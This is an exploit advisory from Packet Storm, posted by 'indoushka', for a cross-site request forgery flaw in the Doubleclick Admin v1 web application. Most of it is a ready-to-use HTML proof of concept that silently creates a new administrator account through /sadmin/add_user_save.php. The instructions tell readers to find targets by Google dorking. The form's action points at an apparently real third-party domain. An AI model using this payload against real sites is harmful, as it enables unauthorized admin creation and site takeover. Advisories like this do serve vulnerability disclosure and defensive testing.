Lucene search
IndoushkaPACKETSTORM:174035HistoryAug 08, 2023 - 12:00 a.m.
Doubleclick Admin 1 Cross Site Request Forgery
2023-08-0800:00:00
indoushka
packetstormsecurity.com
126
cross site request forgery
code injection
admin creation
`====================================================================================================================================
| # Title : Doubleclick Admin v1 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit) |
| # Vendor : https://codecanyon.net/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 2.
[+] Set the target site link Save changes and apply .
[+] infected file : /sadmin/add_user_save.php.
[+] http://127.0.0.1/q7.3/sadmin/add_user_save.php.
[+] save code as poc.html .
<br>
<form action="https://oecglobalnet/application/sadmin/add_user_save.php" method="post" name="formObj" onsubmit="return Check()">
<table width="96%" cellspacing="0" cellpadding="0" border="0" align="center">
<tbody><tr>
<td valign="top" height="30"> <table bordercolorlight="#d9d9d9" bordercolordark="#ffffff" width="100%" cellspacing="0" cellpadding="4" bordercolor="#d9d9d9" border="1" align="center">
<tbody><tr>
<td valign="middle" bgcolor="F5F5F5">ชื่อผู้ใช้งาน
:</td>
<td bgcolor="#FFFFFF"><input name="user" type="text" class="inputbox" id="user" size="30" maxlength="10" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()">
<font color="#FF0000">*</font> </td>
</tr>
<tr>
<td valign="middle" bgcolor="F5F5F5">Level
:</td>
<td bgcolor="#FFFFFF">
<input type="radio" name="level" value="1"> Supper Admin
<input type="radio" name="level" value="2" checked=""> Admin
</td>
</tr>
<tr>
<td valign="middle" bgcolor="F5F5F5">รหัสผ่าน
:</td>
<td bgcolor="#FFFFFF"><input name="pass" type="password" class="inputbox" id="pass" size="30" maxlength="30" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()">
<font color="#FF0000">*</font> </td>
</tr>
<tr>
<td valign="middle" bgcolor="F5F5F5">ยืนยันหรัสผ่าน
:</td>
<td bgcolor="#FFFFFF"><input name="pass2" type="password" class="inputbox" id="pass2" size="30" maxlength="30" style="border:1px #cccccc solid" value="" onfocus="this.style.backgroundColor='ccffcc'" onblur="this.style.backgroundColor='ffffff'" onkeypress="check_userpass()">
<font color="#FF0000">*</font> </td>
</tr>
<tr>
<td width="14%" valign="top" bgcolor="F5F5F5">
</td>
<td width="86%" bgcolor="#FFFFFF"> <div align="left">
<input type="submit" name="Submit" value=" Save ">
</div></td>
</tr>
</tbody></table></td>
</tr>
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================
`